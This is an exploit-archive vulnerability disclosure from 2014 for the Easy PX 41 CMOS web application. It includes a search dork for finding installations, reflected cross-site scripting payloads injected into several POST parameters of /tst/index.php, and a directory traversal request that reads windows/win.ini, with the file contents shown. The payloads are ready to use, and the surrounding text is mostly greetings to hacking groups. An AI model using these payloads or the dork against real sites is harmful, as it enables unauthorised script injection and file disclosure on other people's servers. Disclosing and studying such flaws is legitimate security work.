facebook facebook twitter rss

Easy PX 41 CMOS 06.02.04 Multi Vulnerability

Author: indoushka , Published: 25-10-2014
| # Title    : Easy PX 41 CMOS 06.02.04 Multi Vulnerability   
| # Author : indoushka
| # email : indoushka4ever@gmail.com
| # Dork : Site fonctionnant sous Easy PX 41 CMOS 06.02.04 © 2004 - 2006 Freeware
| # Tested on: windows 8.1 Français V.(Pro)
| # Bug : Mullti
| # Download : http://www.domphp.com/
=======================================

Cross site scripting (verified) :
This vulnerability affects /tst/index.php
URL encoded POST input choixgalerie was set to 1" onmouseover=prompt(951655) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input pg was set to system/fnc/readpg.php'"()&%<ScRiPt >prompt(940614)</ScRiPt>
URL encoded POST input pg was set to modules/login/inscription.php'"()&%<ScRiPt >prompt(904457)</ScRiPt>
URL encoded POST input pg_id was set to http://www.generation-libre.com/index2.php%3foption%3dcom_rss'"()&%<ScRiPt >prompt(920742)</ScRiPt>
URL encoded POST input pg_title was set to RSS'"()&%<ScRiPt >prompt(963497)</ScRiPt>

Directory traversal :

This vulnerability affects /tst/index.php
URL encoded POST input pg was set to ../../../../../../../../../../windows/win.ini
File contents found: ; for 16-bit app support

ex :
IDonglet=3&pg=system/fnc/readpg.php&pgfull=pgfull&pg_id=../../../../../../../../../../windows/win.ini&pg_mode=modules


Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ========================
Greetz :
Exploit-db Team :
(loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/
www.securityreason.com * www.sa-hacker.com * Cyb3r IntRue (avengers team) * www.alkrsan.net * www.mormoroth.net
---------------------------------------------------------------------------------------------------------------

Like us on Facebook :